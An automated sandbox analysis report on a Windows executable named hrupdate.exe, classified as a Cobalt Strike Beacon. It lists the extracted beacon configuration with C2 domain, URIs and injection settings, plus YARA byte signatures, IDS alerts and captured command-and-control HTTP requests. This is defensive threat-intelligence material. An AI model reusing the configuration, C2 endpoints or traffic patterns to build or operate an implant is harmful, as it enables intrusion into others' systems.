Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hrupdate.exe

Overview

General Information

Sample name:hrupdate.exe
Analysis ID:1578569
MD5:03b14e9338a1c9e5551f9450207f6d84
SHA1:f1a816c47637c8d4d0b52b333cba11b0d7571fcb
SHA256:7a4d2b3e83220df7a55944a838bb9ebaa8f8463cff62fa92ae10e640eeb4e498
Tags:CobaltStrikeexeuser-smica83
Infos:

Detection

CobaltStrike
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Machine Learning detection for sample
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • hrupdate.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\hrupdate.exe" MD5: 03B14E9338A1C9E5551F9450207F6D84)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 15000, "MaxGetSize": 2801745, "Jitter": 37, "C2Server": "www.hrtraining.ro,/rss/portallogin-gettask.html", "HttpPostUri": "/rss/portallogin-sendlogin.html", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 309948737, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
  • 0x13d0d4:$beacon_loader_x86: 25 FF FF FF 00 3D 41 41 41 00 75 3B 8B 4D B0 81 E1 FF FF FF 00 81 F9 42 42 42 00 75
  • 0x13dd7f:$beacon_loader_x86: 25 FF FF FF 00 3D 41 41 41 00 75 3B 8B 4D B0 81 E1 FF FF FF 00 81 F9 42 42 42 00 75
dump.pcapWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
  • 0x16f889:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
dump.pcapWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
  • 0x16f8f5:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
dump.pcapTrojan_Raw_Generic_4unknownunknown
  • 0x13da05:$s0: 83 C6 02 8B 7D FC B9 40 00 00 00 F3 A4 8B 45 18 50 6A 40 8B 4D FC 51 E8 DD F8 FF FF 83 C4 0C 8B 55 FC 52 8B 45 14 50 8B 4D 08 8B 51 04 FF D2
  • 0x13e073:$s1: 0F B7 11 81 FA 4D 5A 00 00 75 2E 8B 45 FC 8B 48 3C 89 4D F8 83 7D F8 40 72 1F 81 7D F8 00 04 00 00 73 16 8B 55 F8 03 55 FC 89 55 F8 8B 45 F8 81 38 50 45 00 00 75 02 EB 0B 8B 4D FC 83 E9 01 89 ...

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.3588908785.0000000000C23000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
  • 0x886:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000003.3588908785.0000000000C23000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
  • 0x8f2:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000003.3567810102.0000000000C23000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
  • 0x886:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000003.3567810102.0000000000C23000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
  • 0x8f2:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000003.3867809207.0000000000C23000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
  • 0x886:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
Click to see the 26 entries

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T22:47:48.218861+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549946TCP
2024-12-19T22:48:03.798139+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549979TCP
2024-12-19T22:48:15.611444+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549980TCP
2024-12-19T22:48:29.363989+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549981TCP
2024-12-19T22:48:46.486255+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549982TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T22:45:43.281672+010028033053Unknown Traffic192.168.2.5497043.79.209.7680TCP
2024-12-19T22:47:44.887661+010028033053Unknown Traffic192.168.2.5499383.79.209.7680TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Found malware configuration
Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 15000, "MaxGetSize": 2801745, "Jitter": 37, "C2Server": "www.hrtraining.ro,/rss/portallogin-gettask.html", "HttpPostUri": "/rss/portallogin-sendlogin.html", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 309948737, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: hrupdate.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046A5173 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_046A5173
Source: hrupdate.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 3.79.209.76:443 -> 192.168.2.5:49946 version: TLS 1.2
Source: hrupdate.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dan\source\repos\hrtraining\Release\hrupdate.pdb source: hrupdate.exe
Source: Binary string: C:\Users\dan\source\repos\hrtraining\Release\hrupdate.pdb%% source: hrupdate.exe
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0469F544 _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,0_2_0469F544
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04699839 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_04699839

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49946
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49979
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49981
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49980
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49982
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractorURLs: www.hrtraining.ro
Source: global trafficHTTP traffic detected: GET /trakingu/user HTTP/1.0Host: www.hrtraining.ro
Source: global trafficHTTP traffic detected: GET /trainingcheck_v5498 HTTP/1.0Host: www.hrtraining.ro
Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49704 -> 3.79.209.76:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49938 -> 3.79.209.76:80
Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtkUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtkUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtkUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtkUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtkUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00671CA0 _invalid_parameter_noinfo_noreturn,memcpy,_invalid_parameter_noinfo_noreturn,memcpy,memchr,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,socket,inet_addr,inet_addr,gethostbyname,inet_addr,gethostbyaddr,htons,connect,closesocket,send,memset,recv,realloc,memcpy,memset,recv,strstr,strstr,memcpy,strncpy,closesocket,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00671CA0
Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtkUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtkUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtkUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtkUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtkUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /trakingu/user HTTP/1.0Host: www.hrtraining.ro
Source: global trafficHTTP traffic detected: GET /trainingcheck_v5498 HTTP/1.0Host: www.hrtraining.ro
Source: global trafficDNS traffic detected: DNS query: www.hrtraining.ro
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Thu, 19 Dec 2024 21:45:43 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
Source: hrupdate.exeString found in binary or memory: http://www.hrtraining.ro/trainingcheck_v5498
Source: hrupdate.exe, 00000000.00000002.3897320624.00000000044FC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.hrtraining.ro/trainingcheck_v5498b
Source: hrupdate.exeString found in binary or memory: http://www.hrtraining.ro/trainingcheck_v5498dummyhttp://www.hrtraining.ro/trakingu/invalid
Source: hrupdate.exeString found in binary or memory: http://www.hrtraining.ro/trakingu/
Source: hrupdate.exe, 00000000.00000002.3896775640.0000000000AFB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.hrtraining.ro/trakingu/user
Source: hrupdate.exe, 00000000.00000002.3896775640.0000000000AFB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.hrtraining.ro/trakingu/useruser
Source: hrupdate.exe, 00000000.00000002.3896833882.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3867855312.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.r
Source: hrupdate.exe, 00000000.00000002.3896833882.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3567852375.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000002.3897221347.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3588932882.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3567988184.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3867855312.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3867908182.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3588982597.0000000002DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/
Source: hrupdate.exe, 00000000.00000003.3588932882.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/KSSM
Source: hrupdate.exe, 00000000.00000002.3896833882.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3567852375.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3588932882.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3867855312.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/P
Source: hrupdate.exe, 00000000.00000003.3867855312.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000002.3897221347.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.html
Source: hrupdate.exe, 00000000.00000003.3867908182.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000002.3897221347.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmlN
Source: hrupdate.exe, 00000000.00000002.3896833882.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3567852375.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3588932882.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmlxL
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownHTTPS traffic detected: 3.79.209.76:443 -> 192.168.2.5:49946 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAPMatched rule: Rule for beacon reflective loader Author: unknown
Source: dump.pcap, type: PCAPMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: dump.pcap, type: PCAPMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: dump.pcap, type: PCAPMatched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.3588908785.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000003.3588908785.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000003.3567810102.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000003.3567810102.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000003.3867809207.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000003.3867809207.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.3897384147.00000000046CE000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.3897384147.00000000046CE000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.3896833882.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.3896833882.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
